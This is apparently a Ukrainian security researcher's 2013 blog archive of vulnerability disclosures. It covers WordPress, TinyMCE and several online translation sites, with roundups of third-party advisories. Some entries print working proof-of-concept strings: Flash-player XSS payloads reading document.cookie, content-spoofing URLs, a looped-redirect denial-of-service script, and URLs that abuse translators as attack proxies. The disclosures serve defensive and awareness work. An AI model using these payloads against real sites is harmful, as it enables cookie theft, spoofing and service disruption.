Архів для категорії 'Уразливості'

Добірка уразливостей

20:11 28.06.2013

В даній добірці уразливості в веб додатках:

  • Multiple Vulnerabilities in Linksys WRT160Nv2 (деталі)
  • Multiple Vulnerabilities in Linksys WAG200G (деталі)
  • Multiple Vulnerabilities in Linksys E1500/E2500 (деталі)
  • Sony Playstation Vita Browser - firmware 2.05 - Adressbar spoofing (деталі)
  • RSA Archer GRC Multiple Vulnerabilities (деталі)

Уразливості в плагінах для WordPress №109

22:44 27.06.2013

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах WP-SendSMS, NextGEN Gallery та Ultimate WordPress Auction. Для котрих з’явилися експлоіти. WP-SendSMS - це плагін для відправки смс-повідомлень, NextGEN Gallery - це плагін для створення галерей зображень, Ultimate WordPress Auction - це плагін для створення аукціону.

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Content Spoofing в TinyMCE та WordPress

23:59 26.06.2013

В 2011 році я вже писав про Content Spoofing в Moxieplayer, що є складовою частиною плагіна Media для TinyMCE (він входить в ядро TinyMCE). Даний візуальний редактор постачається з багатьма веб додатками, зокрема з WordPress. Ця флешка постачається з WP починаючи з версії 3.3.

Раніше я вже писав про Denial of Service в WordPress.

Content Spoofing (WASC-12):

Якщо попередня уразливість виглядала наступним чином (починаючи з TinyMCE 3.4b2 і в версії 3.4.7 вона була виправлена):

http://site/moxieplayer.swf?url=http://site2/1.flv

То нещодавно була виявлена нова уразливість, що дозволяє обійти захист і провести CS атаку:

http://site/moxieplayer.swf#?url=http://site2/1.flv

Уразливі версії TinyMCE 3.4b2 - 4.0b3. В червні ця уразливість була виправлена. Оновлена версія Moxieplayer присутня в TinyMCE 4.0.

В WordPress атака з використанням цієї флешки має наступний вигляд.

Попередній варіант:

http://site/wp-includes/js/tinymce/plugins/media/moxieplayer.swf?url=http://site2/1.flv

Уразливі версії WordPress 3.3 - 3.4.2.

Новий варіант:

http://site/wp-includes/js/tinymce/plugins/media/moxieplayer.swf#?url=http://site2/1.flv

Уразливі версії WordPress 3.3 - 3.5.1. Цю уразливість виправили в WP 3.5.2.

Добірка уразливостей

17:21 26.06.2013

В даній добірці уразливості в веб додатках:

  • Serva v2.0.0 HTTP Server GET Remote Denial of Service (деталі)
  • Serva v2.0.0 DNS Server Remote Denial of Service (деталі)
  • Buffalo TeraStation TS-Series multiple vulnerabilities (деталі)
  • Authentication Bypass in LOREX IP Cameras (деталі)
  • Symantec Network Access Control Privilege Escalation (деталі)

Denial of Service в WordPress

23:59 25.06.2013

Торік я писав про XSS уразливості в WordPress, які мають місце в двох редиректорах. Про Redirector уразливості в цих скриптах WP я писав ще в 2007 році (та зробив патчі для них). Розробники виправили редиректори в WP 2.3, тому Redirector і XSS атаки можливі лише в попередніх версіях.

Як я вияснив 24.06.2013, через цей функціонал можна також провести DoS атаки. Тобто з двох редиректорів можна зробити Looped DoS уразливості, поєднавши сайт на WordPress з сервісом редирекції чи іншим сайтом. Дана атака аналогічна зацикленню двох редиректорів, описаному в моїх статтях Пекло редиректорів та Пекельний вогонь для редиректорів.

Раніше я вже писав про CS та XSS уразливості в SWFUpload в WordPress.

Denial of Service (WASC-10):

Потрібно зробити Custom alias на tinyurl.com чи іншому сервісі редирекції, що буде вести на wp-login.php чи wp-pass.php з вказаним аліасом для редирекції.

http://site/wp-login.php?action=logout&redirect_to=http://tinyurl.com/loopeddos1
http://site/wp-pass.php?_wp_http_referer=http://tinyurl.com/loopeddos2

Ось приклади даних уразливостей:

http://tinyurl.com/loopeddos1
http://tinyurl.com/loopeddos2

Дана атака спрацює для WordPress < 2.3. При цьому Mozilla, Firefox, Chrome та Opera після серії запитів зупиняють зациклений редирект, на відміну від IE.

Для того, щоб атака спрацювала у всіх версіях движка, включно з WP 3.5.2, потрібно щоб редиректор був на цьому ж домені, де і сайт на WP. Для цього можна використати будь-яку уразливість, наприклад, reflected XSS чи persistent XSS (на тому ж домені), для включення скрипта для редирекції на один з цих редиректорів:

WordPress_Looped_DoS.html

<script>document.location="http://site/wp-login.php?action=logout&redirect_to=http://site/WordPress_Looped_DoS.html"</script>

WordPress_Looped_DoS-2.html

<script>document.location="http://site/wp-pass.php"</script>

Атака працює як в WordPress 3.5.2 і попередніх версіях, так і не зупиняється браузерами (редирект нескінченний).

Уразливості на www.translate.ru

23:55 22.06.2013

Вчора, 21.06.2013, я знайшов Cross-Site Scripting, Abuse of Functionality та Insufficient Anti-automation на сайті http://www.translate.ru. Про що найближчим часом сповіщу адміністрацію сайта.

Це онлайн перекладач. Даний сервіс може використовуватися для проведення атак на інші сайти - подібно до перекладачів від Google і Yahoo, про що я писав раніше. Про подібні уразливості я писав в статті Використання сайтів для атак на інші сайти. Також я писав про переваги даних атак.

XSS (Remote XSS/HTML Include):

Abuse of Functionality:

http://www.translate.ru/url/translation.aspx?direction=er&sourceURL=http://google.com

Можна проводити атаки на інші сайти. А також проводити DoS атаки на сервер самого сайта, що описано у моїй статті.

Insufficient Anti-automation:

У даному функціоналі немає захисту від автоматизованих запитів (капчі).

Уразливості на www.online-translator.com

17:21 22.06.2013

Вчора, 21.06.2013, я знайшов Cross-Site Scripting, Abuse of Functionality та Insufficient Anti-automation на сайті http://www.online-translator.com. Про що найближчим часом сповіщу адміністрацію сайта.

Це онлайн перекладач. Даний сервіс може використовуватися для проведення атак на інші сайти - подібно до перекладачів від Google і Yahoo, про що я писав раніше. Про подібні уразливості я писав в статті Використання сайтів для атак на інші сайти. Також я писав про переваги даних атак.

XSS (Remote XSS/HTML Include):

Abuse of Functionality:

http://www.online-translator.com/url/translation.aspx?direction=er&sourceURL=http://google.com

Можна проводити атаки на інші сайти. А також проводити DoS атаки на сервер самого сайта, що описано у моїй статті.

Insufficient Anti-automation:

У даному функціоналі немає захисту від автоматизованих запитів (капчі).

Уразливості в плагінах для WordPress №108

23:52 21.06.2013

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Spider Event Calendar, WordPress User Role Editor та WordPress Themes Book. Для котрих з’явилися експлоіти. Spider Event Calendar - це плагін для створення календаря, WordPress User Role Editor - це плагін для редагування ролей користувачів WP, WordPress Themes Book - це розробники тем для движка (зокрема наводиться уразливість в темі Flash Gamer).

  • Spider Event Calendar 1.3.0 Cross Site Scripting / Path Disclosure / SQL Injection (деталі)
  • WordPress User Role Editor 3.12 Cross Site Request Forgery (деталі)
  • WordPress Themes Book Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Уразливості на freetranslation.com

23:57 20.06.2013

У червні, 19.06.2013, я знайшов Cross-Site Scripting, Abuse of Functionality та Insufficient Anti-automation на сайті http://freetranslation.com (зокрема на піддомені fets3.freetranslation.com). Про що найближчим часом сповіщу адміністрацію сайта.

Це онлайн перекладач. Даний сервіс може використовуватися для проведення атак на інші сайти - подібно до перекладачів від Google і Yahoo, про що я писав раніше. Про подібні уразливості я писав в статті Використання сайтів для атак на інші сайти. Також я писав про переваги даних атак.

XSS (Remote XSS/HTML Include):

Abuse of Functionality:

http://fets3.freetranslation.com/?Url=http://google.com&Language=English%2FSpanish&Sequence=core

Можна проводити атаки на інші сайти. А також проводити DoS атаки на сервер самого сайта, що описано у моїй статті.

Insufficient Anti-automation:

У даному функціоналі немає захисту від автоматизованих запитів (капчі).

Уразливості в темі Slash WP для WordPress

17:24 20.06.2013

11.04.2013

У січні, 31.01.2013, я знайшов Full path disclosure, Cross-Site Scripting та Content Spoofing уразливості в темі Slash WP для WordPress. Про що найближчим часом повідомлю розробникам шаблону.

Раніше я вже писав про уразливості в темі Chocolate WP для WordPress від цих розробників.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

20.06.2013

Full path disclosure (WASC-13):

http://site/wp-content/themes/slash-wp/

FPD в index.php та інших php-файлах в папці плагіна та підпапках.

Cross-Site Scripting (WASC-08):

В темі використовується jPlayer 2.1.0 та JW Player 5.8.2011, про уразливості в яких я вже писав.

http://site/wp-content/themes/slash-wp/js/jplayer/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
http://site/wp-content/themes/slash-wp/js/jplayer/Jplayer.swf?id=%27))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
http://site/wp-content/themes/slash-wp/js/jwplayer/player.swf?playerready=alert(document.cookie)
http://site/wp-content/themes/slash-wp/js/jwplayer/player.swf?displayclick=link&link=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B&file=1.jpg

На деяких сайтах з цією темою флешка JW Player є, на інших немає. Згідно з описом теми, JW Player підтримується темою, але не входить в стандартну поставку (лише jPlayer). Але його можна встановити окремо, що і роблять деякі власники сайтів.

Content Spoofing (WASC-12):

Про Content Spoofing уразливості та про інші XSS уразливості в JW Player та в jPlayer, ми можете прочитати у відповідних записах.

Уразливі всі версії теми Slash WP для WordPress.